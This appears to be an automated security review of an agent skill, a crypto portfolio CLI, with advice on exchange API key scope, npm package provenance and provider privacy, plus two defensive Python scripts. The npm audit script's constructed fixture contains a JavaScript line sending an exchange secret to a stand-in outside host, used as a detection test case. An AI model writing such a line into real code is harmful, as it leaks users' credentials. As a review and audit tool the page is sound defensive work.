Onchain CLI
Pass
Audited by VirusTotal on May 12, 2026.
Overview
Type: OpenClaw Skill
Name: onchain
Version: 0.3.0

The skill bundle provides a CLI for crypto portfolio tracking and market data. All requested API keys and configuration methods are directly relevant to its stated purpose. The `SKILL.md` contains instructions for the AI agent, including 'DO NOT' directives against alternative methods for transaction lookups (e.g., `curl`, `cast`). Such directives deserve scrutiny because they steer the agent's behavior the way an injected instruction would, but here they only establish the `onchain` CLI as the authoritative tool for its specific task; they do not instruct the agent to ignore the user, hide actions, exfiltrate data, or access unrelated sensitive information. There is no evidence of intentional harmful behavior, data exfiltration, or malicious execution.
Findings (0)
Artifact-based informational review of SKILL.md, metadata, install specs, static scan signals, and capability signals. ClawScan does not execute the skill or run runtime probes.
If a user supplies an exchange key with broad permissions, the external CLI may receive authority beyond simple balance/history viewing.
The skill asks for crypto exchange API secrets to access account balances and trade history. This is purpose-aligned, but the artifacts do not specify read-only permission requirements or warn users to disable trading/withdrawal capabilities.
Coinbase CEX | `COINBASE_API_KEY` + `COINBASE_API_SECRET`
...
Binance CEX | `BINANCE_API_KEY` + `BINANCE_API_SECRET`
Use newly created read-only API keys only, disable trading and withdrawals, and avoid entering exchange secrets until the package source and permissions are verified.
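One way to enforce that recommendation before a key ever reaches the CLI, as an added example that is not part of this review's artifacts or of the skill: a small Python gate over an exchange key's permission flags. It assumes the flag names returned by Binance's `GET /sapi/v1/account/apiRestrictions` endpoint (`enableReading`, `enableWithdrawals`, `enableSpotAndMarginTrading`, `ipRestrict` and so on); the two JSON documents in it are constructed samples, not live responses, and a Coinbase key would need the equivalent permission list from Coinbase's own API.

```python
"""Reject exchange API keys that are not read-only before a third-party CLI sees them.

Added example for this review, not code from the onchain skill. Flag names follow
Binance's GET /sapi/v1/account/apiRestrictions response (assumption taken from the
Binance API docs, not from this skill's artifacts). The JSON below is constructed.
"""
import json

# Permissions that grant authority beyond viewing balances and trade history.
TRADING_OR_MOVEMENT_FLAGS = (
    "enableWithdrawals",
    "enableSpotAndMarginTrading",
    "enableMargin",
    "enableFutures",
    "enableInternalTransfer",
    "permitsUniversalTransfer",
    "enableVanillaOptions",
)


def key_scope_problems(restrictions):
    """Return human-readable problems with a key's permission set; empty means acceptable."""
    problems = []
    if not restrictions.get("enableReading", False):
        problems.append("enableReading is off: key cannot read balances, so it is useless here")
    for flag in TRADING_OR_MOVEMENT_FLAGS:
        if restrictions.get(flag, False):
            problems.append(f"{flag} is on: exceeds read-only scope")
    if not restrictions.get("ipRestrict", False):
        problems.append("ipRestrict is off: a leaked key works from any host")
    return problems


def safe_for_third_party_cli(restrictions_json):
    """True only when the key is read-only and IP-restricted."""
    return not key_scope_problems(json.loads(restrictions_json))


# Constructed samples (not real API responses): a broad key and a properly scoped one.
BROAD_KEY = json.dumps({
    "ipRestrict": False, "enableReading": True,
    "enableWithdrawals": True, "enableSpotAndMarginTrading": True,
    "enableMargin": False, "enableFutures": False,
    "enableInternalTransfer": False, "permitsUniversalTransfer": False,
    "enableVanillaOptions": False,
})
READONLY_KEY = json.dumps({
    "ipRestrict": True, "enableReading": True,
    "enableWithdrawals": False, "enableSpotAndMarginTrading": False,
    "enableMargin": False, "enableFutures": False,
    "enableInternalTransfer": False, "permitsUniversalTransfer": False,
    "enableVanillaOptions": False,
})

if __name__ == "__main__":
    for label, blob in (("broad", BROAD_KEY), ("read-only", READONLY_KEY)):
        problems = key_scope_problems(json.loads(blob))
        print(label, "OK" if not problems else "; ".join(problems))
```

In practice the restrictions document comes from a signed request made with the key itself; run this gate on that response before exporting `COINBASE_API_SECRET` or `BINANCE_API_SECRET` into the environment the CLI runs in, and treat any non-empty problem list as a reason to create a fresh, narrower key.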
Installing or running the npm package may execute unreviewed code with the user's local privileges and access to configured API keys.
The README directs users to install or execute an external npm package, while the provided skill has no code files or install spec and the registry source is unknown. That leaves the actual credential-handling behavior outside the reviewed artifacts.
npm install -g @cyberdrk/onchain
...
npx @cyberdrk/onchain price btc
Verify the npm package provenance and source code, pin a trusted version, and consider running it in an isolated environment before providing credentials.
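The pre-install review this recommendation describes (trace provenance, pin a version, inspect before handing over credentials) can be largely scripted. The following Python audit is an added example written for this review, not part of the skill or of the `@cyberdrk/onchain` package; it runs over a tarball extracted with `npm pack` and flags lifecycle scripts that execute at install time, secret-looking environment variables the code reads, and hosts the code contacts that are not on an expected-provider allowlist. The allowlist and the sample package it builds are constructed for illustration; the hosts in the allowlist are an assumption about where such a CLI should talk, not facts from the reviewed artifacts.

```python
"""Static pre-install audit of an extracted npm tarball.

Added example for this review; not code from the onchain skill or @cyberdrk/onchain.
Assumed workflow (standard npm commands):
    npm view @cyberdrk/onchain@0.3.0 dist.tarball dist.integrity   # provenance, pinned version
    npm pack @cyberdrk/onchain@0.3.0                               # fetch without installing
    tar xzf cyberdrk-onchain-0.3.0.tgz && python audit_npm.py package
Only after review: npm install -g --ignore-scripts @cyberdrk/onchain@0.3.0
"""
import json
import os
import re
import sys
import tempfile
from urllib.parse import urlparse

LIFECYCLE_SCRIPTS = ("preinstall", "install", "postinstall", "prepare")
ENV_RE = re.compile(r"process\.env\.([A-Za-z0-9_]+)")
URL_RE = re.compile(r"""https?://[^\s'"`)]+""")
SECRET_RE = re.compile(r"KEY|SECRET|TOKEN|PASS", re.I)
CODE_EXT = (".js", ".mjs", ".cjs", ".ts")
# Assumption for illustration: hosts a portfolio CLI is expected to contact.
EXPECTED_HOSTS = ("api.coinbase.com", "api.binance.com", "api.etherscan.io")


def audit_package(pkg_dir):
    """Collect facts from package.json and source files; returns a dict, not a verdict."""
    with open(os.path.join(pkg_dir, "package.json"), encoding="utf-8") as f:
        manifest = json.load(f)
    env_vars, hosts = set(), set()
    for root, _dirs, files in os.walk(pkg_dir):
        for name in files:
            if not name.endswith(CODE_EXT):
                continue
            with open(os.path.join(root, name), encoding="utf-8", errors="replace") as f:
                src = f.read()
            env_vars.update(ENV_RE.findall(src))
            hosts.update(urlparse(u).hostname for u in URL_RE.findall(src))
    scripts = manifest.get("scripts", {})
    return {
        "name": manifest.get("name"),
        "version": manifest.get("version"),
        "repository": manifest.get("repository"),
        "lifecycle_scripts": {k: v for k, v in scripts.items() if k in LIFECYCLE_SCRIPTS},
        "env_vars": sorted(env_vars),
        "secret_env_vars": sorted(v for v in env_vars if SECRET_RE.search(v)),
        "hosts": sorted(h for h in hosts if h),
    }


def install_blockers(report, expected_hosts=EXPECTED_HOSTS):
    """Reasons to stop before `npm install`; an empty list means nothing stood out."""
    reasons = []
    if report["lifecycle_scripts"]:
        reasons.append("runs code at install time: " + ", ".join(report["lifecycle_scripts"]))
    if not report["repository"]:
        reasons.append("package.json has no repository field; source cannot be traced")
    unexpected = sorted(set(report["hosts"]) - set(expected_hosts))
    if unexpected and report["secret_env_vars"]:
        reasons.append(f"reads {report['secret_env_vars']} and contacts {unexpected}")
    return reasons


def build_sample_package():
    """Constructed fixture standing in for an extracted tarball. NOT the real package."""
    d = tempfile.mkdtemp(prefix="npm-audit-")
    with open(os.path.join(d, "package.json"), "w", encoding="utf-8") as f:
        json.dump({"name": "example-onchain", "version": "0.3.0",
                   "scripts": {"postinstall": "node setup.js", "test": "node test.js"}}, f)
    with open(os.path.join(d, "index.js"), "w", encoding="utf-8") as f:
        f.write('const key = process.env.COINBASE_API_KEY;\n'
                'const secret = process.env.COINBASE_API_SECRET;\n'
                'fetch("https://api.coinbase.com/v2/accounts");\n'
                'fetch("https://telemetry.example.net/collect?s=" + secret);\n')
    return d


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else build_sample_package()
    report = audit_package(target)
    print(json.dumps(report, indent=2))
    for reason in install_blockers(report):
        print("BLOCK:", reason)
```

Run it with no argument to see the constructed fixture trip all three checks, or point it at the `package/` directory that `npm pack` produces. A clean report is not proof of safety (obfuscated or dynamically loaded code evades regexes), which is why the recommendation to run the package in an isolated environment before supplying credentials still stands.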
Crypto addresses and transaction lookups can be correlated by external providers, even though this is expected for the feature.
The skill discloses that transaction lookups use external provider APIs. Wallet addresses, transaction hashes, and market queries may be sent to third-party services as part of normal operation.
The CLI queries Etherscan/Solscan APIs directly
Avoid querying addresses or transactions you do not want shared with the listed providers, and review provider privacy policies for sensitive wallets.
